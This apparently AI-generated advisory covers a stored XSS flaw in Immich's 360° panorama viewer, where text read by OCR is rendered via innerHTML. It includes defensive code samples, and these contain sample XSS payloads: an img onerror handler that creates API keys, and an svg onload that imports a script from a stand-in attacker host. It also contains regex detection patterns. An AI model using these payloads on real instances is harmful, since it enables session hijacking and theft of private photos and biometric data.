CVE-2026-35455 Overview
CVE-2026-35455 is a Stored Cross-Site Scripting (XSS) vulnerability affecting Immich, a high-performance self-hosted photo and video management solution. The vulnerability exists in the 360° panorama viewer component, where any authenticated user can execute arbitrary JavaScript in the browser of other users who view a malicious panorama with the OCR overlay enabled.
The attack chain involves uploading an equirectangular image containing specially crafted text. When the OCR feature processes this image, it extracts the malicious text, and the panorama viewer subsequently renders it via innerHTML without proper sanitization. This enables a range of dangerous attacks including session hijacking through persistent API key creation, private photo exfiltration, and unauthorized access to GPS location history and face biometric data.
Critical Impact
Authenticated attackers can steal sessions, exfiltrate private photos, and access sensitive biometric and location data from other users by exploiting the unsanitized OCR output in the panorama viewer.
Affected Products
- Immich versions prior to 2.7.0
Discovery Timeline
- 2026-04-08 - CVE-2026-35455 published to NVD
- 2026-04-09 - Last updated in NVD database
Technical Details for CVE-2026-35455
Vulnerability Analysis
This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), commonly known as Cross-Site Scripting. The flaw exists in how the 360° panorama viewer handles text extracted by the OCR feature.
When a user uploads an equirectangular panoramic image, Immich's OCR functionality processes visible text within the image. An attacker can craft an image containing malicious JavaScript payloads embedded as visible text. The OCR engine faithfully extracts this text, which is then passed to the panorama viewer component.
The core issue lies in the panorama viewer's use of innerHTML to render the OCR-extracted content directly into the DOM without sanitization or encoding. Any markup the OCR engine read off the image is therefore parsed as HTML in the victim's browser. Note that script elements created through innerHTML are not executed by browsers, so a working payload uses an element with an event-handler attribute (for example an img tag whose onerror handler runs the attacker's code) rather than a script tag. The handler then runs in the origin of the Immich web app, in the session of any user who views the panorama with the OCR overlay enabled.
Root Cause
The root cause is the use of innerHTML to render OCR-extracted text without first escaping or sanitizing it. OCR output is user-controlled data (the uploader decides what text appears in the image), yet the application neither output-encodes it, nor uses a text-only DOM path such as textContent, nor passes it through a sanitization library such as DOMPurify before inserting it into the page. In a Svelte-based front end such as Immich's web UI, the same distinction is between a plain {expression}, which is escaped, and {@html expression}, which is not.
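The vulnerable and hardened rendering patterns side by side, as an added example written for this page rather than code taken from Immich. The element stub, the function names and the payload string are constructed for illustration; in a browser the same functions accept a real HTMLElement.

```javascript
// Added example (not Immich code): the innerHTML pattern described above as a
// vulnerable "before" and two hardened "after" variants.

// Minimal stand-in for a DOM element so the functions also run under Node.
// In a browser, pass a real HTMLElement instead.
function makeElement() {
  return { innerHTML: '', textContent: '' };
}

// Constructed OCR output from a crafted panorama. innerHTML does not execute
// <script> children it creates, so the payload is an event-handler attribute.
const MALICIOUS_OCR_TEXT =
  '<img src=x onerror="fetch(\'/api/api-keys\',{method:\'POST\'})">';

// BEFORE: OCR text is interpreted as markup; any tag in it becomes a live element.
function renderOverlayUnsafe(el, ocrText) {
  el.innerHTML = ocrText; // CWE-79: untrusted string parsed as HTML
  return el.innerHTML;
}

// AFTER, option 1: assign as text. The browser never parses it as markup.
function renderOverlaySafe(el, ocrText) {
  el.textContent = ocrText;
  return el.textContent;
}

// AFTER, option 2: when markup is genuinely needed (here: line breaks we add
// ourselves), escape every character that can open or close HTML syntax.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderOverlayEscaped(el, ocrText) {
  // Only the <br> we insert is markup; each OCR line is escaped first.
  el.innerHTML = ocrText.split('\n').map(escapeHtml).join('<br>');
  return el.innerHTML;
}

// Check helper: does the rendered markup still contain a live on*= handler
// inside a tag? True means the payload would fire when the element is attached.
function containsLiveHandler(html) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}
```

The textContent path is the right default for an OCR overlay, since the extracted text is never meant to be markup; DOMPurify belongs in the design only if rich markup from untrusted sources is a requirement.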
Attack Vector
The attack requires only a low-privileged authenticated account on the Immich instance; no administrative rights are needed. The attacker uploads an equirectangular image in which the payload appears as visible, OCR-readable text. When another user opens that panorama with the OCR overlay enabled, the extracted text is rendered unsanitized and the payload executes in the victim's browser session, with the victim's cookies and API access.
The exploitation enables:
- Session Hijacking: Creating persistent API keys to maintain unauthorized access
- Data Exfiltration: Stealing private photos and videos from the victim's library
- Privacy Compromise: Accessing GPS location history and face biometric data
- Account Takeover: Performing actions as the victim user within the Immich application
Exploitation requires user interaction: the victim must open the malicious panorama with the OCR overlay enabled. That limits automatability somewhat, but in a shared or family library panoramas are routinely viewed by other users, and the data at risk (the full photo library, location history and face data) keeps the severity high.
Detection Methods for CVE-2026-35455
Indicators of Compromise
- Unusual API key creation activity, particularly bulk or automated key generation from user sessions
- Stored OCR text for uploaded panoramas that contains HTML tags, event-handler attributes (onerror, onload) or javascript: URIs. The payload lives in the image pixels, so inspect the OCR output the server extracted rather than file metadata or the raw bytes
- Unexpected access patterns to private photo libraries from unfamiliar IP addresses or user agents
- User reports of unexpected behavior when viewing panoramic images with OCR overlay
Detection Strategies
- Deploy a Content Security Policy in report-only mode (Content-Security-Policy-Report-Only with a report-to or report-uri directive) so that inline script and event-handler execution in the viewer produces violation reports without first risking breakage of the UI
- Collect and review those CSP violation reports; server-side application logs do not record client-side script execution, so the browser reports are the primary signal
- Review recently uploaded equirectangular images for embedded text containing HTML tags or JavaScript keywords
- Audit API key creation logs for anomalous patterns indicating potential session hijacking
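A scanner over stored OCR text, as an added example for the review step above. It is not an Immich tool; the row shape (assetId, ownerId, text) and the sample rows are constructed assumptions rather than Immich's database schema, so map the fields to whatever an export of the instance's OCR table actually contains.

```javascript
// Added example (not part of Immich): flag stored OCR text that the vulnerable
// overlay would have rendered as markup. Rows below are constructed sample data.

const OCR_ROWS = [
  { assetId: 'a1', ownerId: 'u-alice',   text: 'WELCOME TO THE BEACH HOUSE' },
  { assetId: 'a2', ownerId: 'u-mallory', text: '<img src=x onerror="fetch(\'/api/api-keys\',{method:\'POST\'})">' },
  { assetId: 'a3', ownerId: 'u-bob',     text: 'Exit -> Stairs' },            // benign angle bracket
  { assetId: 'a4', ownerId: 'u-mallory', text: '<svg/onload=import("//evil.example/x.js")>' },
  { assetId: 'a5', ownerId: 'u-carol',   text: 'Open 9am - 5pm, <3 our customers' }, // benign "<3"
];

// Signals ordered from strongest to weakest. A lone tag-like token on a street
// sign is plausible; an on*= attribute inside a tag is not.
const SIGNALS = [
  { name: 'event-handler-attribute', re: /<[a-z][^>]*\bon[a-z]+\s*=/i },
  { name: 'script-or-embed-tag',     re: /<\/?(script|iframe|object|embed)\b/i },
  { name: 'javascript-uri',          re: /javascript\s*:/i },
  { name: 'html-tag',                re: /<[a-z][a-z0-9-]*(\s[^>]*)?\/?>/i },
];

// Return the names of every signal that matches one OCR string.
function classifyOcrText(text) {
  return SIGNALS.filter((s) => s.re.test(text)).map((s) => s.name);
}

// Walk all rows and keep those with at least one signal.
function findSuspiciousOcr(rows) {
  const hits = [];
  for (const row of rows) {
    const signals = classifyOcrText(row.text);
    if (signals.length > 0) {
      hits.push({ assetId: row.assetId, ownerId: row.ownerId, signals });
    }
  }
  return hits;
}

// Aggregate by uploader: one account with several flagged assets is the
// strongest lead for the API-key and access-log review that follows.
function uploadersByHitCount(hits) {
  const counts = {};
  for (const h of hits) counts[h.ownerId] = (counts[h.ownerId] || 0) + 1;
  return Object.entries(counts).sort((a, b) => b[1] - a[1]);
}

// Stand-alone run: prints flagged assets and the uploader ranking.
console.log(findSuspiciousOcr(OCR_ROWS));
console.log(uploadersByHitCount(findSuspiciousOcr(OCR_ROWS)));
```

Treat the weakest signal (html-tag) as a triage hint rather than an alert; the event-handler and javascript: patterns are what an exploit for this bug actually needs, so those rows and their uploaders should be reviewed first.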
Monitoring Recommendations
- Enable verbose logging for user session activities including API key management operations
- Do not rely on a web application firewall for this vulnerability: the payload is text rendered in the image pixels and the OCR extraction happens server-side, so a WAF inspecting the upload never sees it. Inspect the stored OCR output instead
- Monitor for unusual data access patterns that may indicate automated exfiltration following XSS exploitation
- Implement real-time alerting on CSP violation reports from client browsers
How to Mitigate CVE-2026-35455
Immediate Actions Required
- Upgrade Immich to version 2.7.0 or later immediately
- Review and revoke any suspicious API keys that may have been created through session hijacking
- Audit user activity logs for signs of unauthorized data access or exfiltration
- Consider temporarily disabling OCR until the patch is applied, and check whether text already extracted from existing assets is still served to the viewer
Patch Information
The vulnerability is fixed in Immich version 2.7.0. The fix addresses the unsafe use of innerHTML by implementing proper input sanitization for OCR-extracted content before rendering in the panorama viewer. For detailed information about the security fix, refer to the GitHub Security Advisory.
Workarounds
- Disable the OCR feature entirely if upgrading is not immediately possible
- Immich has no separate permission for panorama uploads, so the practical equivalent is limiting accounts to trusted users and disabling upload-enabled shared links until patched
- Serve a Content Security Policy that does not allow inline script or event handlers (script-src 'self' with no 'unsafe-inline'); test it in report-only mode first, because a front end that relies on inline bootstrap scripts will break under an enforcing policy
For organizations unable to patch immediately, an enforced Content Security Policy that blocks inline script and event-handler execution stops this class of payload from running and is a reasonable defense-in-depth measure while the upgrade is scheduled. It is not a substitute for the fix: the unsanitized markup is still injected into the page, and CSP does not prevent non-script injection such as forged UI elements or links.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

